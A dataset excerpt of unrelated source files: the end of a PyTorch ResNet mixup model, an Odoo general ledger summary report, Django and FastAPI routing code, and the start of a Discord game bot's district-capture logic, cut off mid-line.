1)\n nn.init.constant_(m.bias, 0)\n\n # Zero-initialize the last BN in each residual branch,\n # so that the residual branch starts with zeros, and each residual block behaves like an identity.\n # This improves the model by 0.2~0.3% according to https://arxiv.org/abs/1706.02677\n if zero_init_residual:\n for m in self.modules():\n if isinstance(m, Bottleneck):\n nn.init.constant_(m.bn3.weight, 0)\n elif isinstance(m, BasicBlock):\n nn.init.constant_(m.bn2.weight, 0)\n\n def _make_layer(self, block, planes, blocks, stride=1):\n downsample = None\n if stride != 1 or self.inplanes != planes * block.expansion:\n downsample = nn.Sequential(\n conv1x1(self.inplanes, planes * block.expansion, stride),\n nn.BatchNorm2d(planes * block.expansion),\n )\n\n layers = []\n layers.append(block(self.inplanes, planes, stride, downsample))\n self.inplanes = planes * block.expansion\n for _ in range(1, blocks):\n layers.append(block(self.inplanes, planes))\n\n return nn.Sequential(*layers)\n\n def forward(self, x, target=None, mixup=False, mixup_hidden = True, mixup_alpha=None, lam=0.4):\n if target is not None: \n if mixup_hidden:\n layer_mix = random.randint(0,5)\n elif mixup:\n layer_mix = 0\n else:\n layer_mix = None\n \n out = x\n \n if layer_mix == 0:\n out, target_a, target_b, lam = mixup_data(out, target, lam=lam)\n \n out = self.relu(self.bn1(self.conv1(x)))\n out = self.layer1(out)\n \n if layer_mix == 1:\n out, target_a, target_b, lam = mixup_data(out, target, lam=lam)\n\n out = self.layer2(out)\n \n if layer_mix == 2:\n out, target_a, target_b, lam = mixup_data(out, target, lam=lam)\n\n out = self.layer3(out)\n \n if layer_mix == 3:\n out, target_a, target_b, lam = mixup_data(out, target, lam=lam)\n\n out = self.layer4(out)\n \n if layer_mix == 4:\n out, target_a, target_b, lam = mixup_data(out, target, lam=lam)\n\n out = self.avgpool(out)\n out = out.view(out.size(0), -1)\n out1 = self.fc.forward(out)\n \n if layer_mix == 5:\n out, target_a, target_b, lam = mixup_data(out, target, lam=lam)\n \n return out, out1, target_a, target_b\n else:\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.layer1(out)\n out = self.layer2(out)\n out = self.layer3(out)\n out = self.layer4(out)\n out = self.avgpool(out)\n out = out.view(out.size(0), -1) \n out1 = self.fc.forward(out)\n return out, out1\n\ndef resnet18(**kwargs):\n \"\"\"Constructs a ResNet-18 model.\n \"\"\"\n model = ResNet(BasicBlock, [2, 2, 2, 2], **kwargs)\n return model\n\n\n","repo_name":"yhu01/PT-MAP","sub_path":"res_mixup_model.py","file_name":"res_mixup_model.py","file_ext":"py","file_size_in_byte":7280,"program_lang":"python","lang":"en","doc_type":"code","stars":201,"dataset":"github-code","pt":"16"} +{"seq_id":"1462423882","text":"from odoo import models, api, _\n\nclass ReportGeneralLedger(models.AbstractModel):\n _inherit = \"account.general.ledger\"\n \n def _get_reports_buttons(self):\n \"\"\" Add new button for General Ledger view buttons: 'Print Summary' \"\"\"\n result = super()._get_reports_buttons()\n result.append({'name': _('Print Summary'), 'sequence': 8, 'action': 'print_report_summary'})\n return result\n\n def print_report_summary(self, options):\n \"\"\" Generate lines of summarized general ledger data\n @param options: report options\n @return action of printing the report by its XML ID\n with summary_lines and other needed variables as data of the report action (used in report xml template)\n \"\"\"\n data = {}\n summary_lines = []\n \n # unfold all lines in order to get initial balance lines\n options['unfold_all'] = True\n line_ids = self._get_general_ledger_lines(options, line_id=None)\n \n # define dictionary for initial balance values for each account\n initial_balances_dict = {}\n initial_balance_lines = list(filter(lambda l: l.get('az_line_name') == 'initial_balance_line', line_ids))\n for line in initial_balance_lines:\n initial_balances_dict[line.get('account_id').id] = {'initial_balance': line.get('initial_balance', 0),\n 'initial_credit': line.get('initial_credit', 0),\n 'initial_debit': line.get('initial_debit', 0)\n }\n \n account_lines = list(filter(lambda l: l.get('az_line_name') == 'account_line', line_ids))\n for account_line in account_lines:\n account = account_line.get('account_id')\n initial_balance = initial_balances_dict.get(account.id)\n # logic:\n # 1- if the account line is unfoldable this means no current balance for it\n # ==> the data belongs to previous period (initial balance), so the current credit and debit are 0 and total balance = initial balance\n # (line is unfoldable means the initial_balance variable is None (no initial balance line))\n # 2- account_line contains total credit and total debit (with initial balance values) so current credit = credit - initial credit, same for debit\n summary_lines.append({'account_number': account.code,\n 'account_name': account.name,\n 'balance': account_line.get('balance', 0),\n 'initial_balance': initial_balance.get('initial_balance', 0) if initial_balance != None else account_line.get('balance', 0),\n 'credit': account_line.get('credit', 0) - initial_balance.get('initial_credit') if initial_balance != None else 0,\n 'debit': account_line.get('debit', 0) - initial_balance.get('initial_debit') if initial_balance != None else 0,\n }) \n \n data['summary_lines'] = summary_lines\n data['options'] = options\n data['totals'] = {\n 'balance': sum([sl.get('balance') for sl in summary_lines]),\n 'initial_balance': sum([sl.get('initial_balance') for sl in summary_lines]),\n 'credit': sum([sl.get('credit') for sl in summary_lines]),\n 'debit': sum([sl.get('debit') for sl in summary_lines]),\n }\n return self.env.ref('azk_general_ledger_summary_report.action_report_general_ledger_summary').report_action(self, data=data)\n\n @api.model\n def _get_account_title_line(self, options, account, amount_currency, debit, credit, balance, has_lines):\n \"\"\" Add some new values to the result dictionary to be used in summary report \"\"\"\n result_dict = super()._get_account_title_line(options, account, amount_currency, debit, credit, balance, has_lines)\n result_dict.update({'az_line_name': 'account_line',\n 'account_id': account,\n 'balance': balance,\n 'credit': credit,\n 'debit': debit\n })\n return result_dict\n\n @api.model\n def _get_initial_balance_line(self, options, account, amount_currency, debit, credit, balance):\n \"\"\" Add some new values to the result dictionary to be used in summary report \"\"\"\n result_dict = super()._get_initial_balance_line(options, account, amount_currency, debit, credit, balance)\n result_dict.update({'az_line_name': 'initial_balance_line',\n 'account_id': account,\n 'initial_balance': balance,\n 'initial_credit': credit,\n 'initial_debit': debit\n })\n return result_dict","repo_name":"BAKHROUSHPOS/Bakhroush-Com","sub_path":"azk_general_ledger_summary_report/models/account_general_ledger.py","file_name":"account_general_ledger.py","file_ext":"py","file_size_in_byte":5101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"44329747495","text":"from django.urls import path\n\nfrom . import views\n\napp_name = 'person'\n\nurlpatterns = [\n path('', views.RegisterPersonView.as_view(), name='register'),\n path('listagem/', views.ListPersonView.as_view(), name='listing'),\n path(\n 'atualizar/', views.UpdatePersonView.as_view(), name='update'\n ),\n path('deletar/', views.DeletePersonView.as_view(), name='delete'),\n]\n","repo_name":"Ricardo-Jackson-Ferrari/Teste-pratico-Projeto-em-Django","sub_path":"apps/person/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"42710198124","text":"from typing import Dict, List\n\nfrom fastapi import APIRouter, Depends\nfrom sqlalchemy.orm import Session\n\nfrom app.api.deps import get_current_user_is_approved, get_db\nfrom app.crud import analysis\nfrom app.db.models.user import UsersDBModel\nfrom app.schemas.analysis import AnalysisGetModel\nfrom app.utils.aws import generate_download_url\n\nrouter = APIRouter()\n\n\n@router.post(\"/get\")\nasync def get(\n request_data: AnalysisGetModel,\n current_user: UsersDBModel = Depends(get_current_user_is_approved),\n db: Session = Depends(get_db),\n):\n analysis_data = await analysis.get_by_user_with_images(\n db, current_user.id, request_data\n )\n return {\"result\": list(process_data(analysis_data).values())}\n\n\ndef process_data(analysis_data: List[Dict]) -> Dict:\n data = {}\n for el in analysis_data:\n el = {key: val for key, val in el.items()}\n if el[\"analysis_id\"] not in data:\n data[el[\"analysis_id\"]] = {\n \"comment\": el[\"comment\"],\n \"created_at\": el[\"created_at\"],\n \"images\": [],\n }\n\n data[el[\"analysis_id\"]][\"images\"].append(\n {\n \"position\": el[\"position\"],\n \"url\": generate_download_url(el[\"filename\"], el[\"content_type\"]),\n }\n )\n\n return data\n","repo_name":"kilimangara/e-health-backend","sub_path":"app/api/api_v1/endpoints/analysis/get_by_category.py","file_name":"get_by_category.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"27104421174","text":"import asyncio\nimport math\nimport time\n\nimport discord\n\nimport ewcfg\nimport ewstats\nimport ewutils\nimport ewrolemgr\nfrom ew import EwUser\nfrom ewmarket import EwMarket\n\n\"\"\"\n\tdistrict data model for database persistence\n\"\"\"\nclass EwDistrict:\n\tid_server = \"\"\n\n\t# The district's identifying string\n\tname = \"\"\n\n\t# The faction currently controlling this district\n\tcontrolling_faction = \"\"\n\n\t# The faction currently capturing this district\n\tcapturing_faction = \"\"\n\n\t# The amount of progress made on the capture\n\tcapture_points = 0\n\n\t# The property class of the district\n\tproperty_class = \"\"\n\n\t# The amount of CP it takes for the district to be captured\n\tmax_capture_points = 0\n\n\t# The amount of slime in the district\n\tslimes = 0\n\n\t# Time until the district unlocks for capture again\n\ttime_unlock = 0\n\n\tdef __init__(self, id_server = None, district = None):\n\t\tif id_server is not None and district is not None:\n\t\t\tself.id_server = id_server\n\t\t\tself.name = district\n\n\t\t\t# find the district's property class\n\t\t\tfor poi in ewcfg.poi_list:\n\t\t\t\tif poi.id_poi == self.name:\n\t\t\t\t\tself.property_class = poi.property_class.lower()\n\n\t\t\tif len(self.property_class) > 0:\n\t\t\t\tself.max_capture_points = ewcfg.max_capture_points[self.property_class]\n\t\t\telse:\n\t\t\t\tself.max_capture_points = 0\n\n\t\t\tdata = ewutils.execute_sql_query(\"SELECT {controlling_faction}, {capturing_faction}, {capture_points},{slimes}, {time_unlock} FROM districts WHERE id_server = %s AND {district} = %s\".format(\n\t\t\t\tcontrolling_faction = ewcfg.col_controlling_faction,\n\t\t\t\tcapturing_faction = ewcfg.col_capturing_faction,\n\t\t\t\tcapture_points = ewcfg.col_capture_points,\n\t\t\t\tdistrict = ewcfg.col_district,\n\t\t\t\tslimes = ewcfg.col_district_slimes,\n\t\t\t\ttime_unlock = ewcfg.col_time_unlock,\n\t\t\t), (\n\t\t\t\tid_server,\n\t\t\t\tdistrict\n\t\t\t))\n\n\t\t\tif len(data) > 0: # if data is not empty, i.e. it found an entry\n\t\t\t\t# data is always a two-dimensional array and if we only fetch one row, we have to type data[0][x]\n\t\t\t\tself.controlling_faction = data[0][0]\n\t\t\t\tself.capturing_faction = data[0][1]\n\t\t\t\tself.capture_points = data[0][2]\n\t\t\t\tself.slimes = data[0][3]\n\t\t\t\tself.time_unlock = data[0][4]\n\t\t\t\t# ewutils.logMsg(\"EwDistrict object '\" + self.name + \"' created. Controlling faction: \" + self.controlling_faction + \"; Capture progress: %d\" % self.capture_points)\n\t\t\telse: # create new entry\n\t\t\t\tewutils.execute_sql_query(\"REPLACE INTO districts ({id_server}, {district}) VALUES (%s, %s)\".format(\n\t\t\t\t\tid_server = ewcfg.col_id_server,\n\t\t\t\t\tdistrict = ewcfg.col_district\n\t\t\t\t), (\n\t\t\t\t\tid_server,\n\t\t\t\t\tdistrict\n\t\t\t\t))\n\n\tdef persist(self):\n\t\tewutils.execute_sql_query(\"REPLACE INTO districts(id_server, {district}, {controlling_faction}, {capturing_faction}, {capture_points}, {slimes}, {time_unlock}) VALUES(%s, %s, %s, %s, %s, %s, %s)\".format(\n\t\t\tdistrict = ewcfg.col_district,\n\t\t\tcontrolling_faction = ewcfg.col_controlling_faction,\n\t\t\tcapturing_faction = ewcfg.col_capturing_faction,\n\t\t\tcapture_points = ewcfg.col_capture_points,\n\t\t\tslimes = ewcfg.col_district_slimes,\n\t\t\ttime_unlock = ewcfg.col_time_unlock,\n\t\t), (\n\t\t\tself.id_server,\n\t\t\tself.name,\n\t\t\tself.controlling_faction,\n\t\t\tself.capturing_faction,\n\t\t\tself.capture_points,\n\t\t\tself.slimes,\n\t\t\tself.time_unlock,\n\t\t))\n\t\n\tdef get_number_of_friendly_neighbors(self):\n\t\tif self.controlling_faction == \"\":\n\t\t\treturn 0\n\t\tneighbors = ewcfg.poi_neighbors[self.name]\n\t\tfriendly_neighbors = 0\n\n\t\tfor neighbor_id in neighbors:\n\t\t\tneighbor_data = EwDistrict(id_server = self.id_server, district = neighbor_id)\n\t\t\tif neighbor_data.controlling_faction == self.controlling_faction:\n\t\t\t\tfriendly_neighbors += 1\n\t\treturn friendly_neighbors\n\n\tdef all_neighbors_friendly(self):\n\t\tif self.controlling_faction == \"\":\n\t\t\treturn False\n\t\t\n\t\tneighbors = ewcfg.poi_neighbors[self.name]\n\t\tfor neighbor_id in neighbors:\n\t\t\tneighbor_poi = ewcfg.id_to_poi.get(neighbor_id)\n\t\t\tneighbor_data = EwDistrict(id_server = self.id_server, district = neighbor_id)\n\t\t\tif neighbor_data.controlling_faction != self.controlling_faction and not neighbor_poi.is_subzone and not neighbor_poi.is_outskirts:\n\t\t\t\treturn False\n\t\treturn True\n\n\tdef get_players_in_district(self,\n\t\t\tmin_level = 0,\n\t\t\tmax_level = math.inf,\n\t\t\tlife_states = [],\n\t\t\tfactions = [],\n\t\t\tmin_slimes = -math.inf,\n\t\t\tmax_slimes = math.inf,\n\t\t\tignore_offline = False,\n\t\t\tpvp_only = False\n\t\t):\n\t\tclient = ewutils.get_client()\n\t\tserver = client.get_server(self.id_server)\n\t\tif server == None:\n\t\t\tewutils.logMsg(\"error: couldn't find server with id {}\".format(self.id_server))\n\t\t\treturn []\n\t\ttime_now = int(time.time())\n\n\t\tplayers = ewutils.execute_sql_query(\"SELECT {id_user}, {slimes}, {slimelevel}, {faction}, {life_state}, {time_expirpvp} FROM users WHERE id_server = %s AND {poi} = %s\".format(\n\t\t\tid_user = ewcfg.col_id_user,\n\t\t\tslimes = ewcfg.col_slimes,\n\t\t\tslimelevel = ewcfg.col_slimelevel,\n\t\t\tfaction = ewcfg.col_faction,\n\t\t\tlife_state = ewcfg.col_life_state,\n\t\t\tpoi = ewcfg.col_poi,\n\t\t\ttime_expirpvp = ewcfg.col_time_expirpvp\n\t\t),(\n\t\t\tself.id_server,\n\t\t\tself.name\n\t\t))\n\n\t\tfiltered_players = []\n\t\tfor player in players:\n\t\t\tid_user = player[0]\n\t\t\tslimes = player[1]\n\t\t\tslimelevel = player[2]\n\t\t\tfaction = player[3]\n\t\t\tlife_state = player[4]\n\t\t\ttime_expirpvp = player[5]\n\t\t\t\n\t\t\tmember = server.get_member(id_user)\n\n\t\t\tif member != None:\n\t\t\t\tif max_level >= slimelevel >= min_level \\\n\t\t\t\tand max_slimes >= slimes >= min_slimes \\\n\t\t\t\tand (len(life_states) == 0 or life_state in life_states) \\\n\t\t\t\tand (len(factions) == 0 or faction in factions) \\\n\t\t\t\tand not (ignore_offline and member.status == discord.Status.offline) \\\n\t\t\t\tand not (pvp_only and time_expirpvp < time_now):\n\t\t\t\t\tfiltered_players.append(id_user)\n\n\t\treturn filtered_players\n\n\tdef get_enemies_in_district(self,\n\t\t\tmin_level = 0,\n\t\t\tmax_level = math.inf,\n\t\t\tmin_slimes = -math.inf,\n\t\t\tmax_slimes = math.inf,\n\t\t\tscout_used = False,\n\t\t):\n\n\t\tclient = ewutils.get_client()\n\t\tserver = client.get_server(self.id_server)\n\t\tif server == None:\n\t\t\tewutils.logMsg(\"error: couldn't find server with id {}\".format(self.id_server))\n\t\t\treturn []\n\n\t\tenemies = ewutils.execute_sql_query(\"SELECT {id_enemy}, {slimes}, {level}, {enemytype} FROM enemies WHERE id_server = %s AND {poi} = %s AND {life_state} = 1\".format(\n\t\t\tid_enemy = ewcfg.col_id_enemy,\n\t\t\tslimes = ewcfg.col_enemy_slimes,\n\t\t\tlevel = ewcfg.col_enemy_level,\n\t\t\tenemytype = ewcfg.col_enemy_type,\n\t\t\tpoi = ewcfg.col_enemy_poi,\n\t\t\tlife_state = ewcfg.col_enemy_life_state\n\t\t),(\n\t\t\tself.id_server,\n\t\t\tself.name\n\t\t))\n\n\t\tfiltered_enemies = []\n\t\tfor enemy_data_column in enemies:\n\n\t\t\tfetched_id_enemy = enemy_data_column[0] # data from id_enemy column in enemies table\n\t\t\tfetched_slimes = enemy_data_column[1] # data from slimes column in enemies table\n\t\t\tfetched_level = enemy_data_column[2] # data from level column in enemies table\n\t\t\tfetched_type = enemy_data_column[3] # data from enemytype column in enemies table\n\n\t\t\t# Append the enemy to the list if it meets the requirements\n\t\t\tif max_level >= fetched_level >= min_level \\\n\t\t\tand max_slimes >= fetched_slimes >= min_slimes:\n\t\t\t\tfiltered_enemies.append(fetched_id_enemy)\n\t\t\t\t\n\t\t\t# Don't show sandbags on !scout\n\t\t\tif scout_used and fetched_type == ewcfg.enemy_type_sandbag:\n\t\t\t\tfiltered_enemies.remove(fetched_id_enemy)\n\n\t\treturn filtered_enemies\n\n\tdef decay_capture_points(self):\n\t\tresp_cont_decay = ewutils.EwResponseContainer(client = ewutils.get_client(), id_server = self.id_server)\n\t\tif self.capture_points > 0 and self.time_unlock == 0:\n\n\t\t\tneighbors = ewcfg.poi_neighbors[self.name]\n\t\t\tall_neighbors_friendly = self.all_neighbors_friendly()\n\n\n\t\t\tdecay = -math.ceil(ewcfg.max_capture_points_a / (ewcfg.ticks_per_day * ewcfg.decay_modifier))\n\n\t\t\tslimeoids = ewutils.get_slimeoids_in_poi(poi = self.name, id_server = self.id_server, sltype = ewcfg.sltype_nega)\n\t\t\t\n\t\t\tnega_present = len(slimeoids) > 0\n\t\t\t\n\t\t\tif nega_present:\n\t\t\t\tdecay *= 1.5\n\n\n\t\t\tif self.controlling_faction == \"\" or not all_neighbors_friendly or nega_present: # don't decay if the district is completely surrounded by districts controlled by the same faction\n\t\t\t\t# reduces the capture progress at a rate with which it arrives at 0 after 1 in-game day\n\t\t\t\tresponses = self.change_capture_points(int(decay), ewcfg.actor_decay)\n\t\t\t\tresp_cont_decay.add_response_container(responses)\n\n\t\tif self.capture_points < 0:\n\t\t\tself.capture_points = 0\n\n\t\tif self.capture_points == 0:\n\t\t\tif self.controlling_faction != \"\": # if it was owned by a faction\n\n\t\t\t\tmessage = \"The {faction} have lost control over {district} because of sheer negligence.\".format(\n\t\t\t\t\tfaction = self.controlling_faction,\n\t\t\t\t\tdistrict = ewcfg.id_to_poi[self.name].str_name\n\t\t\t\t)\n\t\t\t\tchannels = [ewcfg.id_to_poi[self.name].channel] + ewcfg.hideout_channels\n\t\t\t\tfor ch in channels:\n\t\t\t\t\tresp_cont_decay.add_channel_response(channel = ch, response = message)\n\t\t\tresponses = self.change_ownership(\"\", ewcfg.actor_decay)\n\t\t\tresp_cont_decay.add_response_container(responses)\n\t\t\tself.capturing_faction = \"\"\n\n\t\treturn resp_cont_decay\n\n\tdef change_capture_lock(self, progress):\n\t\tresp_cont = ewutils.EwResponseContainer(id_server = self.id_server)\n\n\t\tprogress_before = self.time_unlock\n\n\t\tself.time_unlock += progress\n\n\t\tif self.time_unlock < 0:\n\t\t\tself.time_unlock == 0\n\n\t\tprogress_after = self.time_unlock\n\n\t\tif (progress_after // ewcfg.capture_lock_milestone) != (progress_before // ewcfg.capture_lock_milestone):\n\t\t\ttime_mins = ewutils.formatNiceTime(seconds = progress_after, round_to_minutes = True)\n\t\t\tif progress < 0:\n\t\t\t\tif progress_before >= 15 * 60 >= progress_after:\n\t\t\t\t\tmessage = \"{district} will unlock for capture in {time}.\".format(\n\t\t\t\t\t\tdistrict = ewcfg.id_to_poi[self.name].str_name,\n\t\t\t\t\t\ttime = time_mins\n\t\t\t\t\t)\n\t\t\t\t\tchannels = ewcfg.hideout_channels\n\n\t\t\t\t\tfor ch in channels:\n\t\t\t\t\t\tresp_cont.add_channel_response(channel = ch, response = message)\n\t\t\t\t\n\t\t\t\telif progress_before >= 5 * 60 >= progress_after:\n\t\t\t\t\tmessage = \"{district} will unlock for capture in {time}.\".format(\n\t\t\t\t\t\tdistrict = ewcfg.id_to_poi[self.name].str_name,\n\t\t\t\t\t\ttime = time_mins\n\t\t\t\t\t)\n\t\t\t\t\tchannels = ewcfg.hideout_channels\n\n\t\t\t\t\tfor ch in channels:\n\t\t\t\t\t\tresp_cont.add_channel_response(channel = ch, response = message)\n\t\t\t\t\n\t\t\t\tmessage = \"{district} will unlock for capture in {time}.\".format(\n\t\t\t\t\tdistrict = ewcfg.id_to_poi[self.name].str_name,\n\t\t\t\t\ttime = time_mins\n\t\t\t\t)\n\n\t\t\t\tchannels = [ewcfg.id_to_poi[self.name].channel]\n\n\t\t\t\tfor ch in channels:\n\t\t\t\t\tresp_cont.add_channel_response(channel = ch, response = message)\n\n\t\tif self.time_unlock == 0 and progress < 0:\n\t\t\tchip_cont = self.change_capture_points(progress = -1, actor = ewcfg.actor_decay)\n\t\t\tresp_cont.add_response_container(chip_cont)\n\n\t\treturn resp_cont\n\n\tdef change_capture_points(self, progress, actor, num_lock = 0): # actor can either be a faction or \"decay\"\n\t\tprogress_percent_before = int(self.capture_points / self.max_capture_points * 100)\n\n\t\tself.capture_points += progress\n\n\t\tresp_cont_change_cp = ewutils.EwResponseContainer(client = ewutils.get_client(), id_server = self.id_server)\n\n\t\t# ensures that the value doesn't exceed the bounds\n\t\tif self.capture_points < 0:\n\t\t\tself.capture_points = 0\n\t\telif self.capture_points > self.max_capture_points:\n\t\t\tself.capture_points = self.max_capture_points\n\n\t\tprogress_percent_after = int(self.capture_points / self.max_capture_points * 100)\n\n\t\tif num_lock > 0 \\\n\t\tand self.capture_points == self.max_capture_points \\\n\t\tand progress > 0 \\\n\t\tand self.property_class in ewcfg.capture_locks \\\n\t\tand self.time_unlock == 0:\n\t\t\tbase_time_unlock = ewcfg.capture_locks.get(self.property_class)\n\t\t\tresponses = self.change_capture_lock(base_time_unlock + (num_lock - 1) * ewcfg.capture_lock_per_gangster)\n\t\t\tresp_cont_change_cp.add_response_container(responses)\n\n\t\tif progress > 0 and actor != ewcfg.actor_decay:\n\t\t\tself.capturing_faction = actor\n\n\t\t# display a message if it's reached a certain amount\n\t\tif (progress_percent_after // ewcfg.capture_milestone) != (progress_percent_before // ewcfg.capture_milestone): # if a progress milestone was reached\n\t\t\tif progress > 0: # if it was a positive change\n\t\t\t\tif ewcfg.capture_milestone <= progress_percent_after < ewcfg.capture_milestone * 2: # if its the first milestone\n\t\t\t\t\tmessage = \"{faction} have started capturing {district}. Current progress: {progress}%\".format(\n\t\t\t\t\t\tfaction = self.capturing_faction.capitalize(),\n\t\t\t\t\t\tdistrict = ewcfg.id_to_poi[self.name].str_name,\n\t\t\t\t\t\tprogress = progress_percent_after\n\t\t\t\t\t)\n\t\t\t\t\tchannels = [ewcfg.id_to_poi[self.name].channel]\n\n\t\t\t\t\tfor ch in channels:\n\t\t\t\t\t\tresp_cont_change_cp.add_channel_response(channel = ch, response = message)\n\t\t\t\telse:\n\t\t\t\t\t# alert both factions of significant capture progress\n\t\t\t\t\tif progress_percent_after >= 30 > progress_percent_before: # if the milestone of 30% was just reached\n\t\t\t\t\t\tmessage = \"{faction} are capturing {district}.\".format(\n\t\t\t\t\t\t\tfaction = self.capturing_faction.capitalize(),\n\t\t\t\t\t\t\tdistrict = ewcfg.id_to_poi[self.name].str_name,\n\t\t\t\t\t\t\tprogress = progress_percent_after\n\t\t\t\t\t\t)\n\t\t\t\t\t\tif self.controlling_faction == ewcfg.faction_rowdys:\n\t\t\t\t\t\t\tchannels = [ewcfg.channel_rowdyroughhouse]\n\t\t\t\t\t\telif self.controlling_faction == ewcfg.faction_killers:\n\t\t\t\t\t\t\tchannels = [ewcfg.channel_copkilltown]\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tchannels = ewcfg.hideout_channels\n\n\t\t\t\t\t\tfor ch in channels:\n\t\t\t\t\t\t\tresp_cont_change_cp.add_channel_response(channel = ch, response = message)\n\n\t\t\t\t\tif self.controlling_faction != actor: # if it's not already owned by that faction\n\t\t\t\t\t\tmessage = \"{faction} continue to capture {district}. Current progress: {progress}%\".format(\n\t\t\t\t\t\t\tfaction = self.capturing_faction.capitalize(),\n\t\t\t\t\t\t\tdistrict = ewcfg.id_to_poi[self.name].str_name,\n\t\t\t\t\t\t\tprogress = progress_percent_after\n\t\t\t\t\t\t)\n\t\t\t\t\t\tchannels = [ewcfg.id_to_poi[self.name].channel]\n\t\t\t\t\t\t\n\t\t\t\t\t\tfor ch in channels:\n\t\t\t\t\t\t\tresp_cont_change_cp.add_channel_response(channel = ch, response = message)\n\t\t\t\t\telse:\n\t\t\t\t\t\tmessage = \"{faction} are renewing their grasp on {district}. Current control level: {progress}%\".format(\n\t\t\t\t\t\t\tfaction = self.capturing_faction.capitalize(),\n\t\t\t\t\t\t\tdistrict = ewcfg.id_to_poi[self.name].str_name,\n\t\t\t\t\t\t\tprogress = progress_percent_after\n\t\t\t\t\t\t)\n\t\t\t\t\t\tchannels = [ewcfg.id_to_poi[self.name].channel]\n\t\t\t\t\t\t\n\t\t\t\t\t\tfor ch in channels:\n\t\t\t\t\t\t\tresp_cont_change_cp.add_channel_response(channel = ch, response = message)\n\t\t\telse: # if it was a negative change\n\t\t\t\tif self.controlling_faction != \"\": # if the district is owned by a faction\n\t\t\t\t\tif progress_percent_after < 20 <= progress_percent_before:\n\t\t\t\t\t\tmessage = \"{faction}' control of {district} is slipping.\".format(\n\t\t\t\t\t\t\tfaction = self.controlling_faction.capitalize(),\n\t\t\t\t\t\t\tdistrict = ewcfg.id_to_poi[self.name].str_name,\n\t\t\t\t\t\t\tprogress = progress_percent_after\n\t\t\t\t\t\t)\n\t\t\t\t\t\tchannels = ewcfg.hideout_channels\n\t\t\t\t\t\tfor ch in channels:\n\t\t\t\t\t\t\tresp_cont_change_cp.add_channel_response(channel = ch, response = message)\n\n\t\t\t\t\telif progress_percent_after < 50 <= progress_percent_before and actor != ewcfg.actor_decay:\n\t\t\t\t\t\tmessage = \"{faction} are de-capturing {district}.\".format(\n\t\t\t\t\t\t\tfaction = actor.capitalize(),\n\t\t\t\t\t\t\tdistrict = ewcfg.id_to_poi[self.name].str_name,\n\t\t\t\t\t\t\tprogress = progress_percent_after\n\t\t\t\t\t\t)\n\t\t\t\t\t\tchannels = ewcfg.hideout_channels\n\t\t\t\t\t\t\n\t\t\t\t\t\tfor ch in channels:\n\t\t\t\t\t\t\tresp_cont_change_cp.add_channel_response(channel = ch, response = message)\n\n\t\t\t\t\tmessage = \"{faction}' control of {district} has decreased. Remaining control level: {progress}%\".format(\n\t\t\t\t\t\tfaction = self.controlling_faction.capitalize(),\n\t\t\t\t\t\tdistrict = ewcfg.id_to_poi[self.name].str_name,\n\t\t\t\t\t\tprogress = progress_percent_after\n\t\t\t\t\t)\n\t\t\t\t\tchannels = [ewcfg.id_to_poi[self.name].channel]\n\t\t\t\t\t\n\t\t\t\t\tfor ch in channels:\n\t\t\t\t\t\tresp_cont_change_cp.add_channel_response(channel = ch, response = message)\n\t\t\t\telse: # if it's an uncontrolled district\n\t\t\t\t\tmessage = \"{faction}' capture progress of {district} has decreased. Remaining progress: {progress}%\".format(\n\t\t\t\t\t\tfaction = self.capturing_faction.capitalize(),\n\t\t\t\t\t\tdistrict = ewcfg.id_to_poi[self.name].str_name,\n\t\t\t\t\t\tprogress = progress_percent_after\n\t\t\t\t\t)\n\t\t\t\t\tchannels = [ewcfg.id_to_poi[self.name].channel]\n\t\t\t\t\t\n\t\t\t\t\tfor ch in channels:\n\t\t\t\t\t\tresp_cont_change_cp.add_channel_response(channel = ch, response = message)\n\n\t\tif progress < 0 and self.capture_points == 0:\n\t\t\tself.capturing_faction = \"\"\n\n\t\t# if capture_points is at its maximum value (or above), assign the district to the capturing faction\n\t\tif self.capture_points == self.max_capture_points:\n\t\t\tresponses = self.change_ownership(self.capturing_faction, actor)\n\t\t\tresp_cont_change_cp.add_response_container(responses)\n\n\t\t# if the district has decayed or been de-captured and it wasn't neutral anyway, make it neutral\n\t\telif self.capture_points == 0 and self.controlling_faction != \"\":\n\t\t\tresponses = self.change_ownership(\"\", actor)\n\t\t\tresp_cont_change_cp.add_response_container(responses)\n\n\t\treturn resp_cont_change_cp\n\n\t\"\"\"\n\t\tChange who controls the district. Can be used to update the channel topic by passing the already controlling faction as an arg.\n\t\"\"\"\n\tdef change_ownership(self, new_owner, actor, client = None): # actor can either be a faction, \"decay\", or \"init\"\n\t\tresp_cont_owner = ewutils.EwResponseContainer(client = ewutils.get_client(), id_server = self.id_server)\n\n\t\tfactions = [\"\", ewcfg.faction_killers, ewcfg.faction_rowdys]\n\n\t\tif new_owner in factions:\n\t\t\tserver = ewcfg.server_list[self.id_server]\n\t\t\tchannel_str = ewcfg.id_to_poi[self.name].channel\n\t\t\tchannel = ewutils.get_channel(server = server, channel_name = channel_str)\n\n\t\t\tif channel is not None and channel.topic: # tests if the topic is neither None nor empty\n\t\t\t\tinitialized = False\n\n\t\t\t\t# initialize channel topic control statuses\n\t\t\t\tfor faction in factions:\n\t\t\t\t\tif ewcfg.control_topics[faction] in channel.topic:\n\t\t\t\t\t\tinitialized = True\n\n\t\t\t\tif not initialized:\n\t\t\t\t\tnew_topic = channel.topic + \" \" + ewcfg.control_topics[new_owner]\n\n\t\t\t\t# replace the the string of the previously controlling faction with that of the new one.\n\t\t\t\telse:\n\t\t\t\t\tnew_topic = channel.topic.replace(ewcfg.control_topics[self.controlling_faction], ewcfg.control_topics[new_owner])\n\n\t\t\t\tif client is None:\n\t\t\t\t\tclient = ewutils.get_client()\n\n\n\t\t\t\tif client is not None:\n\t\t\t\t\tresp_cont_owner.add_channel_topic(channel = channel_str, topic = new_topic)\n\n\t\t\tif self.controlling_faction != new_owner: # if the controlling faction actually changed\n\t\t\t\tif new_owner != \"\": # if it was captured by a faction instead of being de-captured or decayed\n\t\t\t\t\tcountdown_message = \"\"\n\t\t\t\t\tif self.time_unlock > 0:\n\t\t\t\t\t\tcountdown_message = \"It will unlock for capture again in {}.\".format(ewutils.formatNiceTime(seconds = self.time_unlock, 